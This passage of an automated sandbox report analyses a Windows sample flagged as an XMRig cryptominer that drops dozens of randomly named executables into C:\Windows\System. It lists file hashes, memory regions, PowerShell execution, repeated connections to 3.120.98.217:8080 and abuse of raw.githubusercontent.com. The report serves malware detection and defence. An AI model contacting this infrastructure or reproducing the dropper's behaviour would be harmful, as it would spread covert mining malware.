C:\Windows\System\vrKcfEh.exe

C:\Windows\System\aOxwlMW.exe

C:\Windows\System\aOxwlMW.exe

C:\Windows\System\WLlZnwC.exe

C:\Windows\System\WLlZnwC.exe

C:\Windows\System\fpIhBjX.exe

C:\Windows\System\fpIhBjX.exe

C:\Windows\System\IkafAFf.exe

C:\Windows\System\IkafAFf.exe

C:\Windows\System\tGUQBtf.exe

C:\Windows\System\tGUQBtf.exe

C:\Windows\System\AjotLsL.exe

C:\Windows\System\AjotLsL.exe

C:\Windows\System\UPHjdIm.exe

C:\Windows\System\UPHjdIm.exe

C:\Windows\System\lHdhpiU.exe

C:\Windows\System\lHdhpiU.exe

C:\Windows\System\ymdiJER.exe

C:\Windows\System\ymdiJER.exe

C:\Windows\System\dHXHfbi.exe

C:\Windows\System\dHXHfbi.exe

C:\Windows\System\KUXpknr.exe

C:\Windows\System\KUXpknr.exe

C:\Windows\System\ZkXwVSj.exe

C:\Windows\System\ZkXwVSj.exe

C:\Windows\System\QoxYTlq.exe

C:\Windows\System\QoxYTlq.exe

C:\Windows\System\zVnKnEG.exe

C:\Windows\System\zVnKnEG.exe

C:\Windows\System\KxcKwAN.exe

C:\Windows\System\KxcKwAN.exe

C:\Windows\System\UZPooys.exe

C:\Windows\System\UZPooys.exe

C:\Windows\System\lWrfwZy.exe

C:\Windows\System\lWrfwZy.exe

C:\Windows\System\KuJxKDt.exe

C:\Windows\System\KuJxKDt.exe

C:\Windows\System\SaRvIXb.exe

C:\Windows\System\SaRvIXb.exe

C:\Windows\System\sHoaLtL.exe

C:\Windows\System\sHoaLtL.exe

C:\Windows\System\hRCHvfH.exe

C:\Windows\System\hRCHvfH.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2352-0-0x000000013FEC0000-0x00000001402B6000-memory.dmp

memory/2352-1-0x00000000000F0000-0x0000000000100000-memory.dmp

\Windows\system\MTKniSn.exe

MD5 e60dc265440bc2a8b5174f7db7e87609
SHA1 5f5799a0edfcd7d5e49d5073737927b8c05c07d2
SHA256 4b40eddd6972d84f759bb7e53746828454d5cbd391452542fd341e33fb8ea726
SHA512 39016de58965aee838e2dd9a6948230c9ec5575df7547c70cb4da5c03a2d50cf3aac9c85ff162ae9a1ec3b13480a8c0fbb3469f1ebaa29ccd47f245c2dd64bec

\Windows\system\pxtdjGC.exe

MD5 b1a32e08a038082c988509d4c708dd80
SHA1 3e0aaadcefe11120b2e1da641dbbfc2a750ad765
SHA256 66a5a8197fad3197e69b7180625d0b12f79b7a2ba0789738d6cf1cb9802fbc39
SHA512 df3dd1112e23065d39281e7073337cc7453c2bf6a4a155942cbb039d14db5a84b439c86ab4adef7bfa507d2fe6b37cbffd62f237a87a1c8a95a85d4ecf094ee7

memory/2352-13-0x000000013F660000-0x000000013FA56000-memory.dmp

C:\Windows\system\cJtPwoD.exe

MD5 6bcd46de0fa569a373319eb08be6ae07
SHA1 7c5943bea3c6b6cb38ea17229b9c5dc80361d9e6
SHA256 7c488f08fd0c2ab69816040636c195f9abc6b6bbc421ed865bf7c24c8aa3f930
SHA512 849b15c7e85d7de886ea3333c61a11dd259597e3dd0848db7e2ec61d06428cc6e4a23e4c384eac517dce6abf72a4855574b5504b0ede26f9e5e5176e5b148fe3

C:\Windows\system\cMKesTQ.exe

MD5 bba84af91aecea58cbc03034a0f669ad
SHA1 f69efe15f14b682f564a26a256b09bf3e7d75a09
SHA256 953d424fb15a02cd9b22c77d6124a49004ca5db737124151f9b08069f06f0415
SHA512 b61d885eccc5ac40a275d6fd8a687e21f9e31dc00318c4309dceb71ac2e624a26110b899ceb4150f30601fb110bccbe2ab9b2a80a2f7be425948800faa525500

C:\Windows\system\eniyzxk.exe

MD5 f85b32ed99434db683215ec95aa0dfe3
SHA1 ff80236de4df0dcc454d278b7d5258fbfeb15f63
SHA256 7be338eae85e5bc3c91d40182ae9831c581f66804b74796d86c5bfc8e9f14657
SHA512 23deba645e85b807f3f1569f16f3bd8c5c276a297226935848a621ec621af5a362f9904259617ded5ef98903a28045fbb2c07a7d150adf71cce7dc022e4884e3

\Windows\system\gfifTGX.exe

MD5 79b60e57a84b39ba1ae66dd0a6153b06
SHA1 aa4c036541ac96c07f0cfe102c89044a3ef5f234
SHA256 564cf15e75d3ec5c02349e26ece905aa2c59f11c5e37bc927833ca472102614c
SHA512 32be0582341ece0ca68fb0d6481ca12024cd79710ff1f44988718dc2cd46f91a8fd3855762e54767c422f52c98f0ecf93bfc64763ff48b0096cec2b1e85b60ca

C:\Windows\system\AxZpdxI.exe

MD5 f5417920775281790e6b51728056ba0f
SHA1 763b62b566fad8ca6bd8d9b51f5db01a7ec564aa
SHA256 ff6966643e44e11e30815d71a0234a38839c4eea7ff0dbb62333592f9bcb853c
SHA512 2a5ab2046fec878c86457b6b3dda225f216c0d861fb87305ff2edc34c7b5b012f3ed71a767808a61fa5e7b470203d8433cc3021fe282331fd2f901e415a1330e

C:\Windows\system\lLFvILn.exe

MD5 804d706570c258ee9185d64a16f8a4ba
SHA1 d8290f9ccd7b6294d7eb522ae3466c88acc454ad
SHA256 d3aa310f003e3880898e4a8255e642a1455d3f230d44b282162badf743f10e2e
SHA512 f3da237431ff769abedd44cd8eabf4db6f52a980f8cabfbaaab779f16405d0fe37dcb662cef19ca921bdb332074814e898c5b65dc7cd8896fe8f05e90dc4dd57

C:\Windows\system\Ohxqjpo.exe

MD5 36083798d70343def1c330b4b1dd3c64
SHA1 942ba17c30d46dbff0e4e9314ae284a677f03afb
SHA256 9008943136108d1f01bb9127af5f3de19116a59e1cae4a9be9b4bb81b8e1e893
SHA512 cd82b6517eaa5197297389449939e287dca05e3b185b1f3387468e1d473d4be9b1766f063208d1e4181ebfb97df9743db94e0eda86afa9d341be9d18da527550

\Windows\system\GxmpAVc.exe

MD5 8edbe57bc1e89b2fcaba5d8c17a1260c
SHA1 fc43f501a33d6392cb9e6435401e31283a6dc3a8
SHA256 545c474fb3b09853c0668fad06469b4050336a60ccc4606d465aae0778967d13
SHA512 8dd6063e81b34c4c826605bc94a4016d8bf7cba7a2ccec6dd94d59094ab9370c68ec8b9cd244ae047c38d85c908c46665332b439c1c9f77cf51c38ed0e736c01

C:\Windows\system\bYIjiUg.exe

MD5 1e6e3a2b6ffb3fa17f9374706544a595
SHA1 3e5293789fa6aeaccf2cfec2f65aaa10b7c88feb
SHA256 c12adc257d781d439d29aa5036d3b4c10b907c7dfa1d732b25290756d3f9be80
SHA512 58a5050dcfe50f0dd6f06861486bde1c502a20156961f6eed8db52d267cfbc766197d79755a09c58abf41ccf658d8dc13e0243942f654041c2b99a3147a6a53c

C:\Windows\system\myHSYnJ.exe

MD5 e76c29ef5fa2e32f5758342bc08ed201
SHA1 f319988b5094e49e46b867e15cee19a7dc7c9f06
SHA256 6d0de5fc1f5f4ff4b6382a5314d8aa66057d7d4d0bedb145dd73d77c53278de7
SHA512 cae44843a4b1c4fcc692af7916e955a2b488388d3ca9c9427fe2c9fa47f84665947c3da359b3187635121c86609cc72750ae0e41d7aa66e8cc1be1c82ce490f9

C:\Windows\system\VfYCcpI.exe

MD5 2efcabd83ae630a95d4952adea50408d
SHA1 9b2f1b0e3266f1680238bfc12f2b01fe4edcfe27
SHA256 2a3c2b88c96a4ff6c122777cc1f9648512400fa5f631c8bdc18d19212055051a
SHA512 231db20ccdca59b78acc4c68b4b808547e721f892322f4bfe335dfbfb28adffdb063ddfab98394137c4d6c8e6c66713ae52da60d81465db9477c47cca7f5445f

C:\Windows\system\miPikZW.exe

MD5 558b2dfcaf46355e5fdb8d5f05a6201c
SHA1 ad00755d68deff1c73257fd96052da3ef85cca59
SHA256 7ee3f6a5acac3b1b8e0cd296441c0ae4aea891e52e9e420a860966330b19c07f
SHA512 79046b84f4277b0ba24552c98d88a6adaf789d9a5bfaf2483db78c3d3b8d635429645b2bf43e93e162cd25dc4b3ede513dbbad2cafe5d41c593dd623f36b6276

\Windows\system\kZwvbGv.exe

MD5 3e77c8570a1bd6750db203cc8d9765d5
SHA1 c8757d4a81c5552c07d101be0f94bb3375cc96fd
SHA256 f77dc07162a865f54ae90a6ff02d092ce5c82005e322902351f2b2bed3468d85
SHA512 3f989f4e1044ae2fe94c041555189143cdbebf8085229f782853d18282f9c25ede15aa3081509564660d93ff07bf8678fd908d4c526696502bcd486f64f0a9ff

memory/2652-102-0x000000013F580000-0x000000013F976000-memory.dmp

memory/2352-106-0x0000000003140000-0x0000000003536000-memory.dmp

memory/2352-104-0x000000013F360000-0x000000013F756000-memory.dmp

memory/2352-110-0x000000013FA50000-0x000000013FE46000-memory.dmp

memory/2800-117-0x000000013F9B0000-0x000000013FDA6000-memory.dmp

memory/1920-122-0x000000013FAF0000-0x000000013FEE6000-memory.dmp

memory/2352-123-0x000000013F160000-0x000000013F556000-memory.dmp

memory/2352-130-0x000000013F0E0000-0x000000013F4D6000-memory.dmp

memory/2352-129-0x0000000003140000-0x0000000003536000-memory.dmp

\Windows\system\wBlWqsq.exe

MD5 94fc7383f773067ae006067d3c323d45
SHA1 738933eded68b0e4233db07ceb5a663ea9eb6715
SHA256 29a0be324620376a9b592a0ae1616ac0ac0126452094d350894668f7d6e5d387
SHA512 7c388ca4d3176ad16024319c2f71370135b9e7f24ab9fbf603220c12aa2d0e12e11bf1a6947b66165a475449dd72c2452b9948bb1e0caf4e57efe81e84ba79c0

memory/2976-128-0x000000013F660000-0x000000013FA56000-memory.dmp

memory/2496-127-0x000000013F160000-0x000000013F556000-memory.dmp

\Windows\system\HYMTyuY.exe

MD5 d00b0d5a432773bb93d180326149421e
SHA1 74cfd72a02b95e1ce6795aa83d4a1066a602a314
SHA256 ed309dc5d6bd556da32183c6eedc993f94467d6dc8b0c4e1eb4460783c59a14b
SHA512 7bbb80a41adcf41a875bc9aa48291f4b0bdd8eeacf761434c2894c89c6c1bd3c2b6beeccc28c3a53736825d245ae0612c9dec4c8a8149be0e07b2c9d39290c99

memory/2352-121-0x0000000003140000-0x0000000003536000-memory.dmp

memory/2528-120-0x0000000001E80000-0x0000000001E88000-memory.dmp

\Windows\system\ohMREop.exe

MD5 981969a1ba6772786c8a8ec01389d0d4
SHA1 d273f9218e3d3d41cb8ae87b83b9493a61781e5d
SHA256 493e140d9aced9f18400b9f3aa64e887e2c35bd19816fdf87a8af7a9464d779f
SHA512 acecb60ceb07d4f4c7d373e70ef36dbec9cf4210ba8ade6f1f44c76d286ce7c2c31d689e4dff237ecd9c1799d965d54de84f6b75f1b6f4e37ec7ee522b83b5d3

C:\Windows\system\wbpEhET.exe

MD5 5f05382e443c2885bb7dced565616baa
SHA1 1365d30a7c1d5550b19884d4da6ecda0f37a7da5
SHA256 54c4f34bed4788271c12ee54ea139c03e1f3e68e67950ca9bdd1b47616f027c1
SHA512 44a3997201f3fcf44772979d75558ec55060ae5cb56c7220506d97e23e1d68801f127b7700e21f4c75b8ce08763da48694d8cf36ba4f438000cbfc7f422b14f3

C:\Windows\system\mRvlMfx.exe

MD5 96a13a08d336e5a0dc369b0547e5a6bb
SHA1 32cffad3ef9db2eb4581369da7bac5ac7bdffd68
SHA256 824506e4eb20f249927e9aa2be22a547dfa490d89cc8d02e341aeb9923fe6edb
SHA512 59ae6252b50f2bcfb796c175627e63c593541b35c531418bd7b06814cead8bb6eeeee579d1d008e028e225b5a333a9abb2d89179318938522a30a1e971e7750d

\Windows\system\znBSpUi.exe

MD5 d0eb0a821619634fae9a9d10f724ec6f
SHA1 48d2ce34545bfd222a25b563d5880514538fab08
SHA256 d42c6aef21a3b0208974408ffa84f4ad0ea7d041874f272bb630a50d005726f1
SHA512 1dc2c82c5ab847634087fbfc97b955e29b9111a7d089ad23d99891b5161e1e991a345edaace831e3451af155d426a77bed08c1da4e069926e2c495e34ab1252b

\Windows\system\fJqlTdu.exe

MD5 dcd8dda98be5b7fde320606f2946bbf8
SHA1 a1212acc4debca1f8ba2b61bebaa629e8b9da983
SHA256 f13e8edbd64d49ae5ada80f12365958bc166169f2d9f89212ade386b62a5b055
SHA512 ef2e8eba6b38ff6f213106d7308198b6b6fb0b490e0d8db2125a795b56562f046633c2873cbde7a6e6e4bf3792ec5a92ac33dc6ce9320e4917e686daa8bb6cbe

C:\Windows\system\qUrNGnf.exe

MD5 ebcffceee1de38e1d833d853fb22890f
SHA1 8cf32ecfcc92d5d5ba67603c4c4ec8e38f243df3
SHA256 5db3161a2fd168a856f2a8875f3bc6f0f5439523c5dfc9f76b4d15a681fbd95a
SHA512 e6b8e3937ccf37fcb2c9955596803850f996a9cc704237c70cc64806b78a0ad2aaa5b422af7cbe583eeaae1b610f166a9253542b81dd01d987e74bb661a20134

C:\Windows\system\XZhdYTJ.exe

MD5 c5ee1f42aae69cb3702e0786ff320f95
SHA1 ec9ad8ba8660ab7ad8132ed4872a868ae18fa7c8
SHA256 3d41e99c14e9cbecbddf3faf8b85c82aa795a548a36306d9df8b09c6adda5795
SHA512 91461dcfe6ae48b5e19503fcd25ed17c1f7e853b5354b1e7da9c7d91d0f6815507f5d50326eb18201998d0ce81e1cdb0ceafa2c72e38966ac1a0ef14ff8a744f

C:\Windows\system\eTvIGnS.exe

MD5 b085b97cab1dc026b8bd4a728b7635ed
SHA1 40d9141b160724a3fd7aa96acc8ca0d7e4b8a922
SHA256 e154a0eea60797482428e83be46bd15be66d6cb141ebc242f7a2488f789d1966
SHA512 a1845d7224221b441cc00245753dfaeb17d53a0b2f59d0ec3aad27ba4b51d2643d1ef6ecb98e45223ff18bb30a0f701ec4f4b9992b6472d50e938b91d91e0441

C:\Windows\system\OeQVnBU.exe

MD5 679e0d8b9daf06050175d1a59491bbec
SHA1 fe439ec43920261b8fb3332b9621e950c8f479c2
SHA256 500d764c779ea7a23977dd5cc6a66eac970b02d13ab4e1183486076a41f31afc
SHA512 f847041220dda21115fa16914cb1cd7c07fe05964eed7e70987bc40d346d769c3c9be8d16b8fefbc8447b4931628733873c21704007df5fd8021d0a6134d93f2

\Windows\system\mRvlMfx.exe

MD5 0a323fa3eff823937fb239bff97f8086
SHA1 058088a28c3a2e5335928c4e7a4f25c8b6b8dd42
SHA256 9a7c837285b800a6910ed199e51f31de7a8baa8f1a6a4c5c6f31e3a56fda4ace
SHA512 66337544354be3bfef95541f7b11587f752b983efa4f6387e56ce2f9a67e99929119765c099468b624953a7a62401f09adff46f91edf457e3c3d5b2a1da23cc6

C:\Windows\system\TVQopmo.exe

MD5 7e28a183d891e49cc9326e6a7e3974b1
SHA1 54d28ddc9612c380f5073efeeb059022a7e852bb
SHA256 dfb037f7db25618cd763065d5b88ecb5fe78897486cc605ea7e876749585dc12
SHA512 f84ef56a5c5048cac1caec69f9efa32514fc12bd85108a0a31792d7646b430beb789efb73a73a48638be658c348162f63dd4e75fc20645f7ec462fb8f8dfd815

\Windows\system\zYMRSKr.exe

MD5 bbec229827532cff09b3d6dda94ef139
SHA1 6c07a03d5b545c0e4459ef0b0a915413f12f3558
SHA256 cea90a8c3b03259f80683890142cecba4c55f3c54516297d6af60a5b59f69d47
SHA512 668e7f59f09dd724a8a66e0bef097907c0be6526b311c2650bd497c43f913e386f37b9acac91f40a83c819825f263ee21934333efee96c03fce3dad41185379c

C:\Windows\system\NsfWPyP.exe

MD5 7547296c5ae86026b5b9c7113501c440
SHA1 c7b82623d0fee153506daca5ffed908f26334cb8
SHA256 17203eb4d7ef2e1efc943d019292660242b927fe17ab134841bbbd018b469d2c
SHA512 7dca9b8c9d4f75dc8acc7e6fd6b0d3cd6d5fc99a4bec1de9e85aa5331d5bf3946de28278047d89f52966528dc902ab30667fd15bf2e90b48c87ea1b592c1878a

memory/2528-118-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

C:\Windows\system\JWNZCID.exe

MD5 36c46866b5249576fe2f1329aecb5ade
SHA1 c86bbcaea32de782f897541d1dd917918939d100
SHA256 4a474b6310e14d2c206518789796b8c1de72fa7de79420ade3776a0b41e6f51c
SHA512 63a1febf68c6fceb52f23a2a997b7a946940f7d67cb22da13ddeb21947ed1271ffa588db2a9dbc5612faa7e624553cd739120bf8364dc17fa37aa5d491a280ca

memory/2352-115-0x000000013F9B0000-0x000000013FDA6000-memory.dmp

memory/2704-111-0x000000013FA50000-0x000000013FE46000-memory.dmp

memory/2580-109-0x000000013F190000-0x000000013F586000-memory.dmp

memory/2352-108-0x000000013F190000-0x000000013F586000-memory.dmp

memory/2572-107-0x000000013FCA0000-0x0000000140096000-memory.dmp

memory/2668-105-0x000000013F360000-0x000000013F756000-memory.dmp

memory/2352-100-0x000000013F580000-0x000000013F976000-memory.dmp

memory/2720-95-0x000000013F0E0000-0x000000013F4D6000-memory.dmp

memory/2688-91-0x000000013FEA0000-0x0000000140296000-memory.dmp

memory/2840-74-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2352-73-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

C:\Windows\system\MbDdCML.exe

MD5 adf7abb280026459b40082f5b0c3e9f7
SHA1 d0fba7dd2c76d4513ac37daad688b2568679f588
SHA256 9f16ba3f65c0a230a30525049443f878bdfe62ee63d43e0c1468f8a8e282bd14
SHA512 f456279ab3e8bc9ed329244e96266001d2eaaaf0866272badd9f0851b95f31a7238145908bd9bd4fca3c8d7d8e557a7c4a8e6463211eb4e887955f951786729e

C:\Windows\system\pWDiXOP.exe

MD5 2a888a75d8080d760bdd6669dfcf6663
SHA1 c740b9e7591496f344dee5922c0359ce1ec5e2a0
SHA256 a06ecf77f95c49bea7aa615b6da0b895d8623b4420d9bcd0ea0baab0fbe96dd5
SHA512 0562cb3786f7cf01d612805bf06daf1f50f1982594bf60fa64fff72801c1c0c2a2316cb7789cdd787d1bf3d914aa8188cb5f7271e1fb9ea98decaa03eef2661c

C:\Windows\system\AtzgPFc.exe

MD5 24dd14dd12a6d9cc7d53e9a9bd818818
SHA1 5855500a422c538f0f8b8806177b9950ee61e020
SHA256 6620993ea0b9a963bcae060badddef7ef023eade8138e72e2f85d91a3af6456d
SHA512 9e74dd16a7a1150ebeafade0eb31933435d9ef444725965bb9ba052a04febb60406ae9acfe794988598bba82c30f1d4d22a7a362807102c9635821431dc172f3

C:\Windows\system\DJwfSiV.exe

MD5 14241f349840325e0c7e1ab45b849d7a
SHA1 55621b3f4fae38233a70b7152b952dbd7bf3b4c0
SHA256 8ca93248f876289700909d2e1c4ee27d08e6e23e0aa3ce094b1f436ff1059de9
SHA512 98c3dfdc6f4161e16378974a10d85e6c76a3dd4188a4c7a6ea2a854e5bbb6ff8085779c26d37d7869dce558ba141c66dece57e15d49ba59946fdcdc959d11d70

memory/2976-8830-0x000000013F660000-0x000000013FA56000-memory.dmp

memory/2668-8831-0x000000013F360000-0x000000013F756000-memory.dmp

memory/2652-8836-0x000000013F580000-0x000000013F976000-memory.dmp

memory/2704-8835-0x000000013FA50000-0x000000013FE46000-memory.dmp

memory/2572-8834-0x000000013FCA0000-0x0000000140096000-memory.dmp

memory/2580-8833-0x000000013F190000-0x000000013F586000-memory.dmp

memory/1920-8832-0x000000013FAF0000-0x000000013FEE6000-memory.dmp

memory/2800-8838-0x000000013F9B0000-0x000000013FDA6000-memory.dmp

memory/2496-8841-0x000000013F160000-0x000000013F556000-memory.dmp

memory/2840-8837-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2720-8844-0x000000013F0E0000-0x000000013F4D6000-memory.dmp

memory/2688-8846-0x000000013FEA0000-0x0000000140296000-memory.dmp

memory/2352-8979-0x000000013F360000-0x000000013F756000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 04:42

Reported

2024-05-27 04:45

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\EGNcEww.exe N/A
N/A N/A C:\Windows\System\aBjDFgB.exe N/A
N/A N/A C:\Windows\System\XZurXJK.exe N/A
N/A N/A C:\Windows\System\mBvLyfK.exe N/A
N/A N/A C:\Windows\System\DMxWrra.exe N/A
N/A N/A C:\Windows\System\XLHGrSt.exe N/A
N/A N/A C:\Windows\System\kIWtHjZ.exe N/A
N/A N/A C:\Windows\System\yEGriTw.exe N/A
N/A N/A C:\Windows\System\gtHSbER.exe N/A
N/A N/A C:\Windows\System\ZAffQWP.exe N/A
N/A N/A C:\Windows\System\qWxgkCu.exe N/A
N/A N/A C:\Windows\System\nIHjXjJ.exe N/A
N/A N/A C:\Windows\System\RNJGaYr.exe N/A
N/A N/A C:\Windows\System\wAxzair.exe N/A
N/A N/A C:\Windows\System\iBkIpAE.exe N/A
N/A N/A C:\Windows\System\EsFuPGD.exe N/A
N/A N/A C:\Windows\System\sAHKWry.exe N/A
N/A N/A C:\Windows\System\HNISsuw.exe N/A
N/A N/A C:\Windows\System\ZOWChDr.exe N/A
N/A N/A C:\Windows\System\HMTdzyw.exe N/A
N/A N/A C:\Windows\System\PhpdMap.exe N/A
N/A N/A C:\Windows\System\XsvdTeP.exe N/A
N/A N/A C:\Windows\System\ibqjdFd.exe N/A
N/A N/A C:\Windows\System\PgMVAQi.exe N/A
N/A N/A C:\Windows\System\QGQuexY.exe N/A
N/A N/A C:\Windows\System\HDMtEKK.exe N/A
N/A N/A C:\Windows\System\qNqSUcz.exe N/A
N/A N/A C:\Windows\System\KPZcOTx.exe N/A
N/A N/A C:\Windows\System\JxNtYwE.exe N/A
N/A N/A C:\Windows\System\EynFELo.exe N/A
N/A N/A C:\Windows\System\HDhOXsB.exe N/A
N/A N/A C:\Windows\System\TCdjXnj.exe N/A
N/A N/A C:\Windows\System\rBaUMtP.exe N/A
N/A N/A C:\Windows\System\LpnZXBl.exe N/A
N/A N/A C:\Windows\System\GsHMuGH.exe N/A
N/A N/A C:\Windows\System\HwHofeo.exe N/A
N/A N/A C:\Windows\System\cTgytRb.exe N/A
N/A N/A C:\Windows\System\XePaCLS.exe N/A
N/A N/A C:\Windows\System\BoEOExP.exe N/A
N/A N/A C:\Windows\System\FRQBNUG.exe N/A
N/A N/A C:\Windows\System\BvqjUbO.exe N/A
N/A N/A C:\Windows\System\IOPDlib.exe N/A
N/A N/A C:\Windows\System\VujSXcL.exe N/A
N/A N/A C:\Windows\System\QwwdkjE.exe N/A
N/A N/A C:\Windows\System\OshpavU.exe N/A
N/A N/A C:\Windows\System\wsNxkgP.exe N/A
N/A N/A C:\Windows\System\YnoTzPm.exe N/A
N/A N/A C:\Windows\System\bbtuklJ.exe N/A
N/A N/A C:\Windows\System\PUcoguV.exe N/A
N/A N/A C:\Windows\System\jUbuQHA.exe N/A
N/A N/A C:\Windows\System\khUhOZW.exe N/A
N/A N/A C:\Windows\System\SxLZgAo.exe N/A
N/A N/A C:\Windows\System\EeJSJUw.exe N/A
N/A N/A C:\Windows\System\frQMklf.exe N/A
N/A N/A C:\Windows\System\vGBdkEK.exe N/A
N/A N/A C:\Windows\System\CvBEJsH.exe N/A
N/A N/A C:\Windows\System\GlKezNU.exe N/A
N/A N/A C:\Windows\System\iLRAvBK.exe N/A
N/A N/A C:\Windows\System\VGhsuJk.exe N/A
N/A N/A C:\Windows\System\FQBveYt.exe N/A
N/A N/A C:\Windows\System\hHFNJbN.exe N/A
N/A N/A C:\Windows\System\rcNBrQt.exe N/A
N/A N/A C:\Windows\System\avcPEGG.exe N/A
N/A N/A C:\Windows\System\IPmTTGm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wYbsSMV.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktmYaBk.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyFNMzj.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JrGXGqz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AsARHGz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CHHFweX.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rpkwCow.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UtWdfec.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jcDhBVO.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rCasRIz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RzGBxCe.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PlRqZxb.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vkYFnVG.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mTQCVSA.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
